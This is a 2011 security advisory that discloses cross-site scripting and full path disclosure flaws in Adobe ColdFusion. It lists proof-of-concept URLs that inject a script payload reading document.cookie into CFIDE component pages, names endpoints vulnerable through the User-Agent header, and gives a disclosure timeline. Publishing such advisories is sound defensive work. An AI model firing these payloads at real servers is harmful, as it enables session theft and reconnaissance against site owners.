Adobe ColdFusion 7 Cross Site Scripting

2011-09-27T00:00:00
ID PACKETSTORM:105344
Type packetstorm
Reporter MustLive
Modified 2011-09-27T00:00:00

Description

                                        
                                            `Hello list!  
  
I want to warn you about new security vulnerabilities in Adobe ColdFusion.  
  
These are Cross-Site Scripting and Full path disclosure vulnerabilities.  
  
-------------------------  
Affected products:  
-------------------------  
  
Vulnerable are Adobe ColdFusion 7 and previous versions to XSS, and Adobe  
ColdFusion 9 and previous versions to FPD.  
  
----------  
Details:  
----------  
  
XSS (WASC-08):  
  
http://site/CFIDE/componentutils/componentdetail.cfm?component=%3Cbody%20onload=alert(document.cookie)%3E  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc (XSS via header User-Agent)  
  
http://site/CFIDE/probe.cfm (XSS via header User-Agent)  
  
http://site/CFIDE/Application.cfm (XSS via header User-Agent)  
  
http://site/CFIDE/componentutils/Application.cfm (XSS via header User-Agent)  
  
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm (XSS via header  
User-Agent)  
  
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm (XSS via header  
User-Agent)  
  
Full path disclosure (WASC-13):  
  
http://site/CFIDE/probe.cfm  
  
http://site/CFIDE/componentutils/componentdetail.cfm?component=CFIDE.adminapi.base  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=WEB-INF.cftags.component  
  
http://site/CFIDE/componentutils/cfcexplorer.cfc?method=1  
  
http://site/CFIDE/componentutils/_component_cfcToHTML.cfm  
  
http://site/CFIDE/componentutils/_component_cfcToMCDL.cfm  
  
Via componentdetail.cfm and cfcexplorer.cfc it's possible to get FPD even at  
turned off debug messages at the server.  
  
------------  
Timeline:  
------------  
  
2011.06.25 - announced at my site.  
2011.06.30 - informed developers.  
2011.09.23 - disclosed at my site.  
  
I mentioned about these vulnerabilities at my site:  
http://websecurity.com.ua/5243/  
  
Best wishes & regards,  
MustLive  
Administrator of Websecurity web site  
http://websecurity.com.ua  
  
`